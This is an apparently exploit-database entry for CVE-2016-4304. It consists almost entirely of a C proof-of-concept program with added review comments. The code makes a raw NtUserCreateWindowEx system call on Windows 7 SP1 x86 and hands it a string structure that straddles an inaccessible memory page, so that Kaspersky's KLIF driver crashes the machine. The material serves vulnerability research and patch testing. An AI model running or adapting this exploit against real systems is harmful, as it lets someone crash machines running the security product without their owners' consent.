
Kaspersky Internet Security KLIF Driver NtUserCreateWindowEx_HANDLER Denial of Service(CVE-2016-4304)

13 Oct 2017 00:00:00 — Reported by RootType

Kaspersky KLIF Driver Denial of Service Vulnerability

Code

                                                #include    <stdio.h>
#include    <conio.h>
#include    <windows.h>


typedef         DWORD UARCH;        /* one machine word; this PoC is a 32-bit (x86) build */
typedef         BYTE  UCHAR;

#ifndef __UNICODE_STRING_DEFINED__
#define __UNICODE_STRING_DEFINED__
/* Counted UTF-16 string as consumed by the native (Nt*) API.
 * 8 bytes on x86: two USHORT counters plus a 4-byte pointer. */
typedef struct _UNICODE_STRING {
  USHORT Length;        /* bytes */
  USHORT MaximumLength; /* bytes */
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#endif


/* Offset of Arg1 from ebp inside CallSyscall32_EXT: saved ebp (4) +
 * return address (4) + SyscallNumber (4). */
#define ARG_START   (4*3)

DWORD           _SyscallStub                =   0;              /* filled in by GetSyscallStub() */
DWORD           CreateWindowSyscallNum      =   0x1169;         // windows 7 sp1 x86 -- service number is valid for this build only

/*-----------------------------------------------------------------------
 * UARCH CallSyscall32_EXT(UINT32 SyscallNumber, UARCH Arg1, ..., UARCH Arg15)
 * Issues the native service SyscallNumber through the code at _SyscallStub
 * (set by GetSyscallStub()), forwarding the fifteen dword arguments.
 * Naked: the compiler emits no prologue/epilogue; the inline asm below is
 * the whole function body.
 * In:    [ebp + 8]                 = SyscallNumber (moved into eax)
 *        [ebp + ARG_START + 4*i]   = Arg(i+1), i = 0..14
 * Out:   eax as left by the stub (not touched after the call)
 * Stack: `ret 64` pops SyscallNumber plus all fifteen arguments
 *        (callee cleanup).
 *        NOTE(review): the prototype carries no __stdcall; under MSVC's
 *        default __cdecl the caller pops the arguments again after the
 *        call. Confirm the build uses /Gz or declare the function __stdcall.
 *---------------------------------------------------------------------*/
_declspec(naked) UARCH          CallSyscall32_EXT(UINT32 SyscallNumber,
                   UARCH Arg1,
                   UARCH Arg2,
                   UARCH Arg3,
                   UARCH Arg4,
                   UARCH Arg5,
                   UARCH Arg6,
                   UARCH Arg7,
                   UARCH Arg8,

                   UARCH Arg9,
                   UARCH Arg10,
                   UARCH Arg11,
                   UARCH Arg12,
                   UARCH Arg13,
                   UARCH Arg14,
                   UARCH Arg15)
{
    _asm
    {

        ; we cant use registers here (ebx, esi, edi, ebp*) sorry or everything will start crashing

        push    ebp
        mov     ebp, esp                        ; frame pointer: [ebp+8] = SyscallNumber, [ebp+ARG_START] = Arg1


        ; stack[arguments]: re-push Arg15..Arg1 so that Arg1 ends up on top
        ; (lowest address), the same layout the caller handed us.

        //int       3


        push    [ebp + ARG_START + (4 * 14)]    ; Arg15
        push    [ebp + ARG_START + (4 * 13)]    ; Arg14
        push    [ebp + ARG_START + (4 * 12)]    ; Arg13
        push    [ebp + ARG_START + (4 * 11)]    ; Arg12
        push    [ebp + ARG_START + (4 * 10)]    ; Arg11
        push    [ebp + ARG_START + (4 * 9)]     ; Arg10
        push    [ebp + ARG_START + (4 * 8)]     ; Arg9

        push    [ebp + ARG_START + (4 * 7)]     ; Arg8
        push    [ebp + ARG_START + (4 * 6)]     ; Arg7
        push    [ebp + ARG_START + (4 * 5)]     ; Arg6
        push    [ebp + ARG_START + (4 * 4)]     ; Arg5
        push    [ebp + ARG_START + (4 * 3)]     ; Arg4
        push    [ebp + ARG_START + (4 * 2)]     ; Arg3
        push    [ebp + ARG_START + (4 * 1)]     ; Arg2
        push    [ebp + ARG_START + (4 * 0)]     ; Arg1 (top of stack)

        mov     eax, [ebp + 8]              ; syscall number
        call    dword ptr[_SyscallStub]     ; indirect call to the address computed by GetSyscallStub()

        mov     esp, ebp                    ; drop the re-pushed copies regardless of what the stub popped
        pop     ebp
        ret     4 + (4*15)                  ; pop SyscallNumber + 15 args = 64 bytes (callee cleanup)

    }
}

/* Locates the user32 export used as the native-call stub and stores its
 * adjusted address in the global _SyscallStub.
 * Returns 1 on success; terminates the process with exit(-1) if the
 * export cannot be resolved. */
int GetSyscallStub(void)
{
    HMODULE user32     = (HMODULE)LoadLibrary("user32.dll");
    FARPROC stub_entry = GetProcAddress(user32, "InvalidateRect");

    if (stub_entry == NULL)
    {
        printf(__FUNCTION__": unable to get syscall stub \r\n");
        exit(-1);
    }

    /* +5 skips the opening instruction of the export (presumably the 5-byte
     * `mov eax, imm32` that loads the service number -- verify against the
     * user32 build in use), so CallSyscall32_EXT supplies eax itself. */
    _SyscallStub = (DWORD)stub_entry + 5;
    return 1;
}

/* Changes the protection of [Mem, Mem + Size) to ProtectRights.
 * Returns 1 when VirtualProtect succeeds, 0 otherwise; the previous
 * protection value is discarded. */
int ProtectMemory(PVOID Mem, DWORD Size, DWORD ProtectRights)
{
    DWORD previous_rights;
    BOOL  changed = VirtualProtect(Mem, Size, ProtectRights, &previous_rights);
    return changed ? 1 : 0;
}



/*
 * Registers a trivial window class and then issues the NtUserCreateWindowEx
 * service directly through CallSyscall32_EXT. The class-version and
 * window-name arguments marked "bug here" by the author point at a
 * UNICODE_STRING placed 7 bytes before a PAGE_NOACCESS page, so the 8-byte
 * structure straddles the protection boundary.
 * All constants (service number, struct layout) assume Windows 7 SP1 x86.
 * Returns nothing; on RegisterClassEx failure it prints the error and returns.
 */
void crash_kaspersky(void)
{
    WNDCLASSEX      wcex;
    char WND_CLASS[] = "WWW";

    ZeroMemory(&wcex, sizeof(wcex));
    wcex.cbSize         =   sizeof(WNDCLASSEX);

    wcex.style          =   CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc    =   (WNDPROC)&crash_kaspersky;  /* NOTE(review): not a WNDPROC-shaped function; only matters if a message were ever dispatched to it */
    wcex.hInstance      =   (HINSTANCE)GetModuleHandle(NULL);
    wcex.lpszClassName  =   WND_CLASS;
    wcex.hbrBackground  =   (HBRUSH)(COLOR_WINDOW + 1);
    wcex.hIcon          =   LoadIcon (NULL, IDI_APPLICATION) ;
    wcex.hCursor        =   LoadCursor (NULL, IDC_ARROW) ;

    if (RegisterClassEx(&wcex) == NULL)
    {
        printf(__FUNCTION__": error - RegisterClassEx() error code %d\n", GetLastError());
        return;
    }




    /* Well-formed counted string used for the arguments that do not trigger the bug. */
    UNICODE_STRING us1;
    wchar_t     out_str[]   = L"WWW";
    us1.Buffer              = out_str;
    us1.MaximumLength       = us1.Length = lstrlenW(out_str);   /* NOTE(review): both fields are byte counts but lstrlenW returns a WCHAR count */

    /* Two committed RW pages; the second one is made inaccessible below. */
    UCHAR *bad_pages = (UCHAR*)VirtualAlloc(0, 4096 * 2, MEM_COMMIT, PAGE_READWRITE);
    memset(bad_pages, 0x8, 4096 * 2);   /* NOTE(review): VirtualAlloc result is not NULL-checked before use */

    ProtectMemory((PVOID)&bad_pages[4096], 4096, PAGE_NOACCESS);    /* return value ignored */
    UCHAR *bad = (UCHAR*)&bad_pages[4096 - 7];  /* sizeof(UNICODE_STRING) is 8 on x86: an 8-byte read from here crosses into the no-access page */
    DWORD style =  WS_CAPTION | WS_SYSMENU | WS_GROUP;


    DWORD ret = CallSyscall32_EXT(CreateWindowSyscallNum,   /* ret is never examined */
        WS_EX_CLIENTEDGE,       // ex style
        (UARCH)&us1,            // class name // this does not trigger the bug
        (UARCH)bad,             // plstrClsVersion      // bug here tested
        (UARCH)&us1,            // plstrWindowName      // bug here tested
        style,
        0x10,
        0x20,
        0x30,
        0x40,
        NULL, //hParent
        NULL, //hMenu
        (UARCH)GetModuleHandle(NULL),
        0,
        0x400,
        0);

}

/* Entry point: resolve the user32 stub address, then run the PoC. */
int main(void)
{
    (void)GetSyscallStub();     /* terminates the process itself on failure */
    crash_kaspersky();
    return 0;
}
                              
